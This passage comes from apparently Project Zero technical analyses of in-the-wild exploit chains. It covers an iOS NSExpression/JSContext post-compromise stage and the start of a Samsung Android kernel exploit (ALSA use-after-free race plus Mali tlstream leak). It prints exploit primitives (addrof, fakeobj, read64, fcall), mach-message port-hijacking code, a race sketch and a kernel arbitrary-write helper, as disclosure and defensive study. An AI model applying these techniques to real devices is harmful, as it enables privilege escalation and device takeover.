f_def(9, mach_msg_receive)

f_def(10, mach_make_memory_entry)

f_def(11, mach_port_type)

f_def(12, IOMainPort)

f_def(13, IOServiceMatching)

f_def(14, IOServiceGetMatchingService)

f_def(15, IOServiceOpen)

f_def(16, IOConnectCallMethod)

f_def(17, open)

f_def(18, sprintf)

f_def(19, printf)

f_def(20, OSSpinLockLock)

f_def(21, objc_msgSend)

Another path

Still not satisfied with the ability to call arbitrary (exported, named) functions from NSExpressions the exploit now takes yet another turn and comes, in a certain sense, full circle by creating a JSContext object to evaluate javascript code embedded in a string inside the NSExpression:

id v_JSContext = [[JSContext alloc] init];

[v_JSContext evaluateScript:@"function hex(b){return(\"0\"+b.toString(16)).substr(-2)}function hexlify(bytes){var res=[];for(var i=0..." ];

...

The exploit evaluates three separate scripts inside this same context:

JS 1

The first script defines a large set of utility types and functions common to many JS engine exploits. For example it defines a Struct type:

const Struct = function() {

  var buffer = new ArrayBuffer(8);

  var byteView = new Uint8Array(buffer);

  var uint32View = new Uint32Array(buffer);

  var float64View = new Float64Array(buffer);

  return {

    pack: function(type, value) {

       var view = type;

       view[0] = value;

       return new Uint8Array(buffer, 0, type.BYTES_PER_ELEMENT)

      },

    unpack: function(type, bytes) {

        if (bytes.length !== type.BYTES_PER_ELEMENT) throw Error("Invalid bytearray");

        var view = type;

        byteView.set(bytes);

        return view[0]

    },

    int8: byteView,

    int32: uint32View,

    float64: float64View

  }

}();

The majority of the code is defining a custom fully-featured Int64 type.

At the end they define two very useful helper functions:

function addrof(obj) {

  addrof_obj_ary[0] = obj;

  var addr = Int64.fromDouble(addrof_float_ary[0]);

  addrof_obj_ary[0] = null;

  return addr

}

function fakeobj(addr) {

  addrof_float_ary[0] = addr.asDouble();

  var fake = addrof_obj_ary[0];

  addrof_obj_ary[0] = null;

  return fake

}

as well as a read64() primitive:

function read64(addr) {

  read64_float_ary[0] = addr.asDouble();

  var tmp = "";

  for (var it = 0; it < 4; it++) {

    tmp = ("000" + read64_str.charCodeAt(it).toString(16)).slice(-4) + tmp

  }

  var ret = new Int64("0x" + tmp);

  return ret

}

Of course, these primitives don't actually work - they are the standard primitives which would usually be built from a JS engine vulnerability like a JIT compiler bug, but there's no vulnerability being exploited here. Instead, after this script has been evaluated the NSExpression uses the [JSContext objectForKeyedSubscript] method to look up the global objects used by those primitives and directly corrupt the underlying objects like the arrays used by addrof and fakeobj such that they work.

This sets the stage for the second of the three scripts to run:

JS 2

JS2 uses the corrupted addrof_* arrays to build a write64 primitive then declares the following dictionary:

var all_function = {

  syscall: 0n,

  mach_task_self: 1n,

  task_get_special_port: 2n,

  mach_port_allocate: 3n,

  sleep: 4n,

  mach_absolute_time: 5n,

  mach_msg: 6n,

  mach_msg2_trap: 7n,

  mach_msg_send: 8n,

  mach_msg_receive: 9n,

  mach_make_memory_entry: 10n,

  mach_port_type: 11n,

  IOMainPort: 12n,

  IOServiceMatching: 13n,

  IOServiceGetMatchingService: 14n,

  IOServiceOpen: 15n,

  IOConnectCallMethod: 16n,

  open: 17n,

  sprintf: 18n,

  printf: 19n

};

These match up perfectly with the first 20 symbols which the NSExpression looked up via dlsym.

For each of those symbols they define a JS wrapper, like for example this one for task_get_special_port:

function task_get_special_port(task, which_port, special_port) {

    return fcall(all_function["task_get_special_port"], task, which_port, special_port)

}

They declare two ArrayBuffers, one named lock and one named func_buffer:

var lock = new Uint8Array(32);

var func_buffer = new BigUint64Array(24);

They use the read64 primitive to store the address of those buffers into two more variables, then set the first byte of the lock buffer to 1:

var lock_addr = read64(addrof(lock).add(16)).noPAC().asDouble();

var func_buffer_addr = read64(addrof(func_buffer).add(16)).noPAC().asDouble();

lock[0] = 1;

They then define the fcall function which the JS wrappers use to call the native symbols:

function

fcall(func_idx,

      x0 = 0x34343434n, x1 = 1n, x2 = 2n, x3 = 3n,

      x4 = 4n, x5 = 5n, x6 = 6n, x7 = 7n,

      varargs = [0x414141410000n,

                 0x515151510000n,

                 0x616161610000n,

                 0x818181810000n])

{

  if (typeof x0 !== "bigint") x0 = BigInt(x0.toString());

  if (typeof x1 !== "bigint") x1 = BigInt(x1.toString());

  if (typeof x2 !== "bigint") x2 = BigInt(x2.toString());

  if (typeof x3 !== "bigint") x3 = BigInt(x3.toString());

  if (typeof x4 !== "bigint") x4 = BigInt(x4.toString());

  if (typeof x5 !== "bigint") x5 = BigInt(x5.toString());

  if (typeof x6 !== "bigint") x6 = BigInt(x6.toString());

  if (typeof x7 !== "bigint") x7 = BigInt(x7.toString());

  let sanitised_varargs =

    varargs.map(

      (x => typeof x !== "bigint" ? BigInt(x.toString()) : x));

  func_buffer[0] = func_idx;

  func_buffer[1] = x0;

  func_buffer[2] = x1;

  func_buffer[3] = x2;

  func_buffer[4] = x3;

  func_buffer[5] = x4;

  func_buffer[6] = x5;

  func_buffer[7] = x6;

  func_buffer[8] = x7;

  sanitised_varargs.forEach(((x, i) => {

    func_buffer[i + 9] = x

  }));

  lock[0] = 0;

  lock[4] = 0;

  while (lock[4] != 1);

  return new Int64("0x" + func_buffer[0].toString(16))

}

This coerces each argument to a BigInt then fills the func_buffer first with the index of the function to call then each argument in turn. It clears two bytes in the lock ArrayBuffer then waits for one of them to become 1 before reading the return value, effectively implementing a spinlock.

JS 2 doesn't call fcall though. We now return to the NSExpression to analyse what must be the other side of that ArrayBuffer "shared memory" function call primitive.

In the background

Once JS 2 has been evaluated the NSExpression again uses the [JSContext objectForKeyedSubscript:] method to read the lock_addr and func_buffer_addr variables.

It then creates another NSInvocation but this time instead of using the double invocation trick it sets the target of the NSInvocation to an NSExpression; sets the selector to expressionValueWithObject: and the second argument to the context dictionary which contains the variables defined in the NSExpression. They then call performSelectorInBackground:sel(invoke), causing part of the serialized object to be evaluated in a different thread. It's that background code which we'll look at now:

Loopy landscapes

NSExpressions aren't great for building loop primitives. We already saw that the loop to traverse the linked-list of pthreads was just unrolled 100 times. This time around they want to create an infinite loop, which can't just be unrolled! Instead they use the following construct:

Diagram showing a NSNull alloc node with two arguments, both of which point to the same  child node

They build a tree where each sub-level is evaluated twice by having two arguments which both point to the same expression. Right at the bottom of this tree we find the actual loop body. There are 33 of these doubling-nodes meaning the loop body will be evaluated 2^33 times, effectively a while(1) loop.
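To see why 33 levels suffice, here's a toy Python model of the construct, with ordinary closures standing in for the shared expression subtrees:

evals = 0

def body():
    global evals
    evals += 1

def doubling_node(child):
    # models an expression node whose two arguments are the *same* subtree:
    # evaluating the node evaluates the child twice
    return lambda: (child(), child())

node = body
for _ in range(33):
    node = doubling_node(node)

# Calling node() would now run body() 2**33 (~8.6 billion) times -
# effectively an infinite loop from the evaluator's point of view.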

Let's look at the body of this loop:

[v_OSSpinLockLockInvocationInstance

  setTarget:[v_functions_listener_lock longLongValue] ];

[v_OSSpinLockLockInvocationInstance

  setSelector:[@0x43434343 longLongValue] ];

[v_OSSpinLockLockInvocationInstanceIMP

  setTarget:v_OSSpinLockLockInvocationInstance ];

[v_OSSpinLockLockInvocationInstanceIMP invoke];

v_functions_listener_lock is the address of the backing buffer of the ArrayBuffer containing the "spinlock" which the JS unlocks after writing all the function call parameters into the func_buffer ArrayBuffer. This calls OSSpinLockLock to lock that lock.

The NSExpression reads the function index from the func_buffer ArrayBuffer backing buffer then reads 19 argument slots, writing each 64-bit value into the corresponding slot (target, selector, arguments) of an NSInvocation. They then convert the function index into a string and call valueForKey on the context dictionary which stores all the NSExpression variables to find the variable with the provided numeric string name (recall that they defined a variable called '0' storing a PACIZA'ed pointer to "syscall".)

They use the double invocation trick to call the target function then extract the return value from the NSInvocation and write it into the func_buffer:

[v_serializedInvName getReturnValue:[set_msb(v_functions_listener_buffer) longLongValue] ];

Finally, the loop body ends with an arbitrary write to unlock the spinlock, allowing the JS which was spinning to continue and read the function call result from the ArrayBuffer.
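Putting the two halves together, here's a toy Python model of the whole cross-language call protocol, with two threads standing in for the JS and NSExpression sides (the names are mine, and the write ordering is tweaked slightly versus the real code to keep the toy race-free):

import threading

lock = bytearray(8)        # models the "lock" Uint8Array
func_buffer = [0] * 24     # models the "func_buffer" BigUint64Array
lock[0] = 1                # the servicer starts out holding the lock

FUNCS = {0: lambda *args: sum(args)}   # stands in for the dlsym'd pointers

def servicer():
    # models the unrolled NSExpression loop running in the background thread
    while True:
        while lock[0] != 0:            # OSSpinLockLock stand-in
            pass
        lock[0] = 1                    # take the lock back
        idx, args = func_buffer[0], func_buffer[1:9]
        func_buffer[0] = FUNCS[idx](*args)   # the double-invocation call
        lock[4] = 1                    # the "arbitrary write to unlock"

def fcall(idx, *args):
    # models the JS side: write the request, drop the lock, spin on result
    for i, a in enumerate(args):
        func_buffer[i + 1] = a
    func_buffer[0] = idx
    lock[4] = 0
    lock[0] = 0                        # hand the lock to the servicer
    while lock[4] != 1:                # spin until the result is ready
        pass
    return func_buffer[0]

threading.Thread(target=servicer, daemon=True).start()
print(fcall(0, 1, 2, 3))               # prints 6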

Then back in the main NSExpression thread it evaluates one final piece of JS in the same JSContext:

JS3

Unlike JS1 and 2 and the NSExpression, JS 3 is stripped and partially obfuscated, though with some analysis most of the names can be recovered. For example, the script starts by defining a number of constants - these in fact come from a number of system headers and the values appear in exactly the same order as the system headers:

const z = 16;

const u = 17;

const m = 18;

const x = 19;

const f = 20;

const v = 21;

const b = 22;

const p = 24;

const l = 25;

const w = 26;

const y = 0;

const B = 1;

const I = 2;

const F = 3;

const U = 4;

const k = 2147483648;

const C = 1;

const N = 2;

const S = 4;

const T = 0x200000000n;

Matching these obfuscated constants against the system headers, in that same order, lets us restore the original names:

const MACH_MSG_TYPE_MOVE_RECEIVE = 16;

const MACH_MSG_TYPE_MOVE_SEND = 17;

const MACH_MSG_TYPE_MOVE_SEND_ONCE = 18;

const MACH_MSG_TYPE_COPY_SEND = 19;

const MACH_MSG_TYPE_MAKE_SEND = 20;

const MACH_MSG_TYPE_MAKE_SEND_ONCE = 21;

const MACH_MSG_TYPE_COPY_RECEIVE = 22;

const MACH_MSG_TYPE_DISPOSE_RECEIVE = 24;

const MACH_MSG_TYPE_DISPOSE_SEND = 25;

const MACH_MSG_TYPE_DISPOSE_SEND_ONCE = 26;

const MACH_MSG_PORT_DESCRIPTOR = 0;

const MACH_MSG_OOL_DESCRIPTOR = 1;

const MACH_MSG_OOL_PORTS_DESCRIPTOR = 2;

const MACH_MSG_OOL_VOLATILE_DESCRIPTOR = 3;

const MACH_MSG_GUARDED_PORT_DESCRIPTOR = 4;

const MACH_MSGH_BITS_COMPLEX = 0x80000000;

const MACH_SEND_MSG = 1;

const MACH_RCV_MSG = 2;

const MACH_RCV_LARGE = 4;

const MACH64_SEND_KOBJECT_CALL = 0x200000000n;

The code begins by using a number of symbols passed in from the outer RCE js to find the HashMap storing the mach ports implementing the WebContent to GPU Process IPC:

//WebKit::GPUProcess::GPUProcess

var WebKit::GPUProcess::GPUProcess =

  new Int64("0x0a1a0a1a0a2a0a2a");

// offset of m_webProcessConnections HashMap in GPUProcess

var offset_of_m_webProcessConnections =

  new Int64("0x0a1a0a1a0a2a0a2b"); // 136

// offset of IPC::Connection m_connection in GPUConnectionToWebProcess

var offset_of_m_connection_in_GPUConnectionToWebProcess =

 new Int64("0x0a1a0a1a0a2a0a2c"); // 48

// offset of m_sendPort

var offset_of_m_sendPort_in_IPC_Connection = new Int64("0x0a1a0a1a0a2a0a2d"); // 280

// find the m_webProcessConnections HashMap:

var m_webProcessConnections =

  read64( WebKit::GPUProcess::GPUProcess.add(

           offset_of_m_webProcessConnections)).noPAC();

They iterate through all the entries in that HashMap to collect all the mach ports representing all the GPU Process to WebContent IPC connections:

var entries_cnt = read64(m_webProcessConnections.sub(8)).hi().asInt32();

var GPU_to_WebProcess_send_ports = [];

for (var he = 0; he < entries_cnt; he++) {

  var hash_map_key = read64(m_webProcessConnections.add(he * 16));

  if (hash_map_key.is0() ||

      hash_map_key.equals(const_int64_minus_1))

  {

    continue

  }

 

  var GPUConnectionToWebProcess =

    read64(m_webProcessConnections.add(he * 16 + 8));

  if (GPUConnectionToWebProcess.is0()) {

    continue

  }

  var m_connection =

    read64(

      GPUConnectionToWebProcess.add(

        offset_of_m_connection_in_GPUConnectionToWebProcess));

  var m_sendPort =

    BigInt(read64(

      m_connection.add(

        offset_of_m_sendPort_in_IPC_Connection)).lo().asInt32());

  GPU_to_WebProcess_send_ports.push(m_sendPort)

}

They allocate a new mach port then iterate through each of the GPU Process to WebContent connection ports, sending each one a mach message with a port descriptor containing a send right to the newly allocated port:

for (let WebProcess_send_port of GPU_to_WebProcess_send_ports) {

  for (let _ = 0; _ < d; _++) {

    // memset the message to 0

    for (let e = 0; e < msg.byteLength; e++) {

      msg.setUint8(e, 0)

    }

  // complex message

  hello_msg.header.msgh_bits.set(

    msg, MACH_MSG_TYPE_COPY_SEND | MACH_MSGH_BITS_COMPLEX, 0);

  // send to the web process

  hello_msg.header.msgh_remote_port.set(

    msg, WebProcess_send_port, 0);

  hello_msg.header.msgh_size.set(msg, hello_msg.__size, 0);

  // one descriptor

  hello_msg.body.msgh_descriptor_count.set(

    msg, 1, hello_msg.header.__size);

  // send a right to the comm port:

  hello_msg.communication_port.name.set(

    msg, comm_port_receive_right,

    hello_msg.header.__size + hello_msg.body.__size);

  // give other side a send right

  hello_msg.communication_port.disposition.set(

    msg, MACH_MSG_TYPE_MAKE_SEND,

    hello_msg_buffer.header.__size + hello_msg.body.__size);

  hello_msg.communication_port.type.set(

    msg, MACH_MSG_PORT_DESCRIPTOR,

    hello_msg.header.__size + hello_msg.body.__size);

  msg.setBigUint64(hello_msg.data.offset, BigInt(_), true);

  // send the request

  kr = mach_msg_send(u8array_backing_ptr(msg));

  if (kr != KERN_SUCCESS) {

    continue

  }

}

Note that, apart from having to use ArrayBuffers instead of pointers, this looks almost like it would if it was written in C and executing truly arbitrary native code. But as we've seen, there's a huge amount of complexity hidden behind that simple call to mach_msg_send.

The JS then tries to receive a reply to the hello message; if it gets one, it's assumed that it has found the WebContent process which compromised the GPU process and is waiting for the GPU process exploit to succeed.

It's at this point that we finally approach the final stages of this writeup.

Last Loops

Having established a new communications channel with the native code running in the WebContent process, the JS enters an infinite loop waiting to service requests:

function handle_comms_with_compromised_web_process(comm_port) {

  var kr = KERN_SUCCESS;

  let request_msg = alloc_message_from_proto(req_proto);

  while (true) {

    for (let e = 0; e < request_msg.byteLength; e++) {

      request_msg.setUint8(e, 0)

    }

    req_proto.header.msgh_local_port.set(request_msg, comm_port, 0);

    req_proto.header.msgh_size.set(request_msg, req_proto.__size, 0);

    // get a request

    kr = mach_msg_receive(u8array_backing_ptr(request_msg));

    if (kr != KERN_SUCCESS) {

      return kr

    }

    let msgh_id = req_proto.header.msgh_id.get(request_msg, 0);

    handle_request_from_web_process(msgh_id, request_msg)

  }

}

In the end, this entire journey culminates in the vending of 9 new js-implemented IPCs (msgh_id values 0 through 8).

IPC 0:

Just sends a reply message containing KERN_SUCCESS.

IPCs 1 - 4:

These interact with the AppleM2ScalerCSCDriver userclient and presumably trigger the kernel bug.

IPC 5:

Wraps io_service_open_extended, taking a service name and connection type.

IPC 6:

This takes an address and a size and creates a VM_PROT_READ | VM_PROT_WRITE mach_memory_entry covering the requested region, which it returns via a port descriptor.
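Under the hood, creating such an entry presumably boils down to something like this sketch, given the address and size from the request; the exact flags and error handling used by the exploit are assumptions:

#include <mach/mach.h>

// Create a read/write memory entry covering [address, address + size); the
// resulting mem_entry port can then be returned via a port descriptor.
static mach_port_t make_rw_entry(mach_vm_address_t address,
                                 memory_object_size_t size) {
  memory_object_size_t entry_size = size;
  mach_port_t mem_entry = MACH_PORT_NULL;
  kern_return_t kr = mach_make_memory_entry_64(mach_task_self(),
                                               &entry_size,
                                               (memory_object_offset_t)address,
                                               VM_PROT_READ | VM_PROT_WRITE,
                                               &mem_entry,
                                               MACH_PORT_NULL);  // no parent entry
  return kr == KERN_SUCCESS ? mem_entry : MACH_PORT_NULL;
}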

IPC 7:

This IPC extracts the requested mach port name and returns it via a MOVE_SEND disposition.

IPC 8:

This simply calls the exit syscall, presumably to cleanly terminate the process. If that fails, it causes a NULL pointer dereference to crash the process:

  case request_id_const_8: {

    syscall(1, 0);

    read64(new Int64("0x00000000"));

    break

  }

Conclusion

This exploit was undoubtedly complex. Often this complexity is interpreted as a sign that the difficulty of finding and exploiting vulnerabilities is increasing. Yet the buffer overflow vulnerability at the core of this exploit was not complex - it was a well-known, simple anti-pattern in a programming language whose security weaknesses have been studied for decades. I imagine that this vulnerability was relatively easy for the attackers to discover.

The vast majority of the complexity lay in the later post-compromise stages - the glue which connected this IPC vulnerability to the next one in the chain. In my opinion, the reason the attackers invested so much time and effort in this part is that it's reusable. It is a high one-time cost which then hugely decreases the marginal cost of gluing the next IPC bug to the next kernel bug.

Even in a world with NX memory, mandatory code signing, pointer authentication and a myriad of other mitigations, creative attackers are still able to build weird machines just as powerful as native code. The age of data-only exploitation is truly here, and yet another mitigation to fix one more trick is unlikely to end it. What does make a difference is focusing on the fundamentals: early-stage design and code reviews, broad testing, and code quality. This vulnerability was introduced less than two years ago; as an industry we should, at a minimum, be aiming to ensure that new code is vetted for well-known vulnerabilities like buffer overflows - a low bar which is clearly still not being met.

Analyzing a Modern In-the-wild Android Exploit

19 September 2023 at 16:01

By Seth Jenkins, Project Zero

Introduction


In December 2022, Google’s Threat Analysis Group (TAG) discovered an in-the-wild exploit chain targeting Samsung Android devices. TAG’s blog post covers the targeting and the actor behind the campaign. This is a technical analysis of the final stage of one of the exploit chains, specifically CVE-2023-0266 (a 0-day in the ALSA compatibility layer) and CVE-2023-26083 (a 0-day in the Mali GPU driver) as well as the techniques used by the attacker to gain kernel arbitrary read/write access.


Notably, the earlier stages of the exploit chain used a mix of 0-day and n-day vulnerabilities:

  • CVE-2022-4262, a 0-day vulnerability in Chrome, was exploited in the Samsung browser to achieve RCE.

  • CVE-2022-3038, a Chrome n-day that remained unpatched in the Samsung browser, was used to escape the Samsung browser sandbox.

  • CVE-2022-22706, a Mali n-day, was used to achieve higher-level userland privileges. While that bug had been patched by Arm in January of 2022, the patch had not been downstreamed into Samsung devices at the point that the exploit chain was discovered.

We now pick up the thread after the attacker has achieved execution as system_server.


Bug #1: Compatibility Layers Have Bugs Too (CVE-2023-0266)

The exploit continues with a race condition in the kernel Advanced Linux Sound Architecture (ALSA) driver, CVE-2023-0266. 64-bit Android kernels support 32-bit syscall calling conventions in order to maintain compatibility with 32-bit programs and apps. As part of this compatibility layer, the kernel maintains code to translate 32-bit system calls into a format understandable by the rest of the 64-bit kernel code. In many cases, the code backing this compatibility layer simply wraps the 64-bit system calls with no extra logic, but in some cases important behaviors are re-implemented in the compatibility layer’s code. Such duplication increases the potential for bugs, as the compatibility layer can be forgotten while making consequential changes. 


In 2017, there was a refactoring in the ALSA driver to move the lock acquisition out of snd_ctl_elem_{write|read}() functions and further up the call graph for the SNDRV_CTL_IOCTL_ELEM_{READ|WRITE} ioctls. However, this commit only addressed the 64-bit ioctl code, introducing a race condition into the 32-bit compatibility layer SNDRV_CTL_IOCTL_ELEM_{READ|WRITE}32 ioctls.


The 32-bit and 64-bit ioctls differ until they both call snd_ctl_elem_{write|read}, so when the lock was moved up the 64-bit call chain, it was entirely removed from the 32-bit ioctls. Here's the code path for SNDRV_CTL_IOCTL_ELEM_WRITE in 64-bit mode on kernel 5.10.107 post-refactor:


snd_ctl_ioctl

  snd_ctl_elem_write_user

    [takes controls_rwsem]

    snd_ctl_elem_write [lock properly held, all good]

    [drops controls_rwsem]



And here is the code path for that same ioctl called in 32-bit mode:


snd_ctl_ioctl_compat

  snd_ctl_elem_write_user_compat

    ctl_elem_write_user

      snd_ctl_elem_write [missing lock, not good]


These missing locks allowed the attacker to race snd_ctl_elem_add and snd_ctl_elem_write_user_compat calls resulting in snd_ctl_elem_write executing with a freed struct snd_kcontrol object. The 32-bit SNDRV_CTL_IOCTL_ELEM_READ ioctl behaved very similarly to the SNDRV_CTL_IOCTL_ELEM_WRITE ioctl, with the same bug leading to a similar primitive.
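To make the race concrete, the userland side of such an attack can be sketched as follows, from a 32-bit process with two racing threads; the control setup is elided, and the exact create/free choreography the attackers used is an assumption:

#include <pthread.h>
#include <sys/ioctl.h>
#include <sound/asound.h>

extern int ctl_fd;                     // open handle to /dev/snd/controlC0
extern struct snd_ctl_elem_info info;  // describes a user-created control
extern struct snd_ctl_elem_id id;      // id of that same control

// Hammer the write path: from a 32-bit process this reaches
// snd_ctl_elem_write() via the compat ioctl, without controls_rwsem held.
static void *writer(void *unused) {
  struct snd_ctl_elem_value val = { .id = id };
  for (;;)
    ioctl(ctl_fd, SNDRV_CTL_IOCTL_ELEM_WRITE, &val);
  return NULL;
}

// Repeatedly create and destroy the control, so that the unlocked write
// above can run against a freed struct snd_kcontrol.
static void *freer(void *unused) {
  for (;;) {
    ioctl(ctl_fd, SNDRV_CTL_IOCTL_ELEM_ADD, &info);
    ioctl(ctl_fd, SNDRV_CTL_IOCTL_ELEM_REMOVE, &id);
  }
  return NULL;
}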


In March 2021, these missing locks were added to SNDRV_CTL_IOCTL_ELEM_WRITE32 in upstream commit 1fa4445f9adf1, when the locks were moved back from snd_ctl_elem_write_user into snd_ctl_elem_write in what was supposed to be an inconsequential refactor. This change accidentally fixed the SNDRV_CTL_IOCTL_ELEM_WRITE32 half of the bug. However, this commit was never backported or merged into the Android kernel, as its security impact was not identified, and so the bug was able to be exploited in-the-wild in December 2022. The SNDRV_CTL_IOCTL_ELEM_READ32 call also remained unpatched until January 2023, when the in-the-wild exploit was discovered.


A New Heap Spray Primitive

Most exploits take advantage of such a classical UAF condition by reclaiming the virtual memory backing the freed object with attacker-controlled data, and this exploit is no exception. Interestingly, the attacker used Mali GPU driver features to perform the reclaim, even though the primary memory corruption bug is agnostic to the GPU used by the device. By creating many REQ_SOFT_JIT_FREE jobs gated behind a BASE_JD_REQ_SOFT_EVENT_WAIT, the attacker can take advantage of the associated kmalloc_array/copy_to_user calls in kbase_jit_free_prepare to create a powerful heap spray: one that is fully attacker-controlled, variable in size, temporally indefinite, and controllably freeable. Heap sprays with all of these properties are uncommon but not unheard of. Other heap spray strategies do exist, but at least some of them, such as the userfaultfd technique, are mitigated by SELinux policy and sysctl parameters, although others (such as the equivalent technique provided by AppFuse) may still exist. That makes this new technique particularly potent on Android devices, where many of these spray strategies are mitigated.
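The Mali job-submission plumbing involved is fairly elaborate, but the lifecycle of the spray can be sketched at a high level as follows. Both helpers here are hypothetical stand-ins for the real job-chain construction, not driver APIs:

// Each queued JIT_FREE soft-job carries an attacker-supplied ids array
// (allocated in the kernel via kmalloc_array) and is gated behind a soft
// event, so the allocation persists until the attacker releases it.
for (int i = 0; i < NUM_SPRAYS; i++)
  submit_jit_free_gated_on_event(mali_fd, spray_data, spray_size, event_handle);

/* ... reclaim the freed snd_kcontrol, use the forged object ... */

// Signalling the soft event lets the queued jobs run, freeing the sprayed
// kernel buffers on demand.
signal_soft_event(mali_fd, event_handle);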


Bug #2: A Leaky Feature (CVE-2023-26083)

Mali provides a performance tracing facility called "timeline stream", "tlstream" or "tl". This facility was available to unprivileged code, traced all GPU operations across the whole system (including GPU operations by other processes), and used kernel pointers as object identifiers in the messages sent to userspace. This means that by generating tlstream events referencing objects containing attacker-controlled data, the attackers are able to place 16 bytes of controlled data at a known kernel address. Additionally, the attackers can use this capability to defeat KASLR, as these kernel pointers also leak information about the kernel address space back to userland. This issue was reported to ARM as CVE-2023-26083 on January 17th, 2023, and is now fixed by preventing unprivileged access to the tlstream facility.


Combining The Primitives

The heap spray described above is used to reclaim the backing store of the improperly freed struct snd_kcontrol used in snd_ctl_elem_write. The tlstream facility then allows attackers to fill that backing store with pointers to attacker controlled data. Blending these two capabilities allows attackers to forge highly detailed struct snd_kcontrol objects. The snd_ctl_elem_write code (along with the struct snd_kcontrol definition) is shown below:


struct snd_kcontrol {
    struct list_head list;  /* list of controls */
    struct snd_ctl_elem_id id;
    unsigned int count;     /* count of same elements */
    snd_kcontrol_info_t *info;
    snd_kcontrol_get_t *get;
    snd_kcontrol_put_t *put;
    union {
        snd_kcontrol_tlv_rw_t *c;
        const unsigned int *p;
    } tlv;
    unsigned long private_value;
    void *private_data;
    void (*private_free)(struct snd_kcontrol *kcontrol);
    struct snd_kcontrol_volatile vd[];  /* volatile data */
};

...

static int snd_ctl_elem_write(struct snd_card *card, struct snd_ctl_file *file,
                              struct snd_ctl_elem_value *control)
{
    struct snd_kcontrol *kctl;
    struct snd_kcontrol_volatile *vd;
    unsigned int index_offset;
    int result;

    down_write(&card->controls_rwsem);
    kctl = snd_ctl_find_id(card, &control->id);
    if (kctl == NULL) {
        up_write(&card->controls_rwsem);
        return -ENOENT;
    }

    index_offset = snd_ctl_get_ioff(kctl, &control->id);
    vd = &kctl->vd[index_offset];
    if (!(vd->access & SNDRV_CTL_ELEM_ACCESS_WRITE) || kctl->put == NULL ||
        (file && vd->owner && vd->owner != file)) {
        up_write(&card->controls_rwsem);
        return -EPERM;
    }

    snd_ctl_build_ioff(&control->id, kctl, index_offset);
    result = snd_power_ref_and_wait(card);
    /* validate input values */
    ...
    if (!result)
        result = kctl->put(kctl, control);
    ... //Drop the locks and return
}


While there are a couple different options available in this function to take advantage of an attacker-controlled kctl, the most apparent is the call to kctl->put. Since the attacker has arbitrary control of the kctl->put function pointer, they could have used this call right away to gain control over the program counter. However in this case they chose to store the developer-intended snd_ctl_elem_user_put function pointer in the kctl->put member and use the call to that function to gain arbitrary r/w instead. By default, snd_ctl_elem_user_put is the put function for snd_kcontrol structs. snd_ctl_elem_user_put does the following operations:

struct user_element {
    ...
    char *elem_data;              /* element data */
    unsigned long elem_data_size; /* size of element data in bytes */
    ...
};

static int snd_ctl_elem_user_put(struct snd_kcontrol *kcontrol,
                                 struct snd_ctl_elem_value *ucontrol)
{
    int change;
    struct user_element *ue = kcontrol->private_data;
    unsigned int size = ue->elem_data_size;
    char *dst = ue->elem_data +
            snd_ctl_get_ioff(kcontrol, &ucontrol->id) * size;

    change = memcmp(&ucontrol->value, dst, size) != 0;
    if (change)
        memcpy(dst, &ucontrol->value, size);
    return change;
}


The attacker uses their (attacker-controlled data at known address) primitive provided by the tlstream facility to generate an allocation acting as a user_element struct. The pointer to this struct is later fed into the kctl struct as the private_data field, giving the attacker control over the struct user_element used in this function. The destination for the memcpy call comes directly out of this user_element struct, meaning that the attacker can set the destination to an arbitrary kernel address. Since the ucontrol->value used as the source comes directly from userland by design, this leads directly to an arbitrary write of controlled data to kernel virtual memory.
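Putting this together, triggering one instance of the arbitrary write from userland plausibly reduces to the following sketch; it assumes the reclaimed control can be addressed by a numid known to the attacker, and the 512-byte limit comes from the snd_ctl_elem_value layout in the ALSA uapi:

#include <string.h>
#include <sys/ioctl.h>
#include <sound/asound.h>

extern int ctl_fd;
extern unsigned int forged_numid;  // resolves to the reclaimed, forged kctl

// Write up to 512 bytes of payload to the kernel address that the fake
// user_element's elem_data field points at.
static void kwrite_via_put(const void *payload, size_t len) {
  struct snd_ctl_elem_value val = {0};
  val.id.numid = forged_numid;
  memcpy(val.value.bytes.data, payload, len);       // becomes the memcpy source
  ioctl(ctl_fd, SNDRV_CTL_IOCTL_ELEM_WRITE, &val);  // ends in kctl->put(kctl, &val)
}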

A Recap of the Linux Kernel VFS Subsystem

This write primitive is unreliable, as each use of it depends on winning races and on heap sprays landing correctly. The exploit therefore proceeds by using this initial, unreliable write to construct a deterministic, highly reliable arbitrary read/write. In the Linux kernel virtual filesystem (VFS) architecture, every struct file comes with a struct file_operations member that defines a set of function pointers used for various system calls such as read, write, ioctl, mmap, etc. These functions interpret the struct file's private_data member in a type-specific way: private_data is usually a pointer to one of a variety of different data structures, depending on the specific struct file. Both of these members, the private_data and the fops, are populated into the struct file upon allocation/creation of the struct file, which happens, for example, within syscalls in the open family. This fops table can be registered as part of a miscdevice, which is used for certain files in the /dev filesystem - for example /dev/ashmem, an Android-specific shared memory API:


static const struct file_operations ashmem_fops = {
    .owner = THIS_MODULE,
    .open = ashmem_open,
    .release = ashmem_release,
    .read_iter = ashmem_read_iter,
    .llseek = ashmem_llseek,
    .mmap = ashmem_mmap,
    .unlocked_ioctl = ashmem_ioctl,
#ifdef CONFIG_COMPAT
    .compat_ioctl = compat_ashmem_ioctl,
#endif
};

static struct miscdevice ashmem_misc = {
    .minor = MISC_DYNAMIC_MINOR,
    .name = "ashmem",
    .fops = &ashmem_fops,
};

static int __init ashmem_init(void)
{
    int ret = -ENOMEM;
    ...
    ret = misc_register(&ashmem_misc);
    if (unlikely(ret)) {
        pr_err("failed to register misc device!\n");
        goto out_free2;
    }
    ...
}

Under normal circumstances, the intended flow is that when userland calls open on /dev/ashmem, a struct file is created, and a pointer to the ashmem_fops table is populated into the struct.


Stabilizing The Arbitrary Write

While the fops table itself is read-only, the ashmem_misc data structure that contains the pointer used for populating future struct files during an open of /dev/ashmem is not. By replacing ashmem_misc.fops with a pointer to a fake file_operations struct, an attacker can control the file_operations that will be used by files created by open("/dev/ashmem") going forward. This requires forging a replacement ashmem_fops file_operations table in kernel memory, so that a future arbitrary write can place a pointer to that table into the ashmem_misc structure. While the previously explained Mali tlstream "controlled data at a known kernel address" primitive (CVE-2023-26083) provides precisely this sort of ability, the object read out via tlstream only gives 16 bytes of attacker-controlled data - not enough controlled memory to forge a complete file_operations table. Instead, the attackers use their initial arbitrary write to construct a new fake fops table within the .data section of the kernel. The exploit writes into the init_uts_ns kernel symbol, in particular the part of the associated structure that holds the uname of the kernel. Overwriting data in this structure provides a clear indicator of when the race conditions are won and the arbitrary write succeeds: the uname syscall returns different data than before.
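Checking for that indicator from userland is then trivial; a minimal sketch, assuming the write plants a known marker at the start of the version string (the marker value here is hypothetical):

#include <string.h>
#include <sys/utsname.h>

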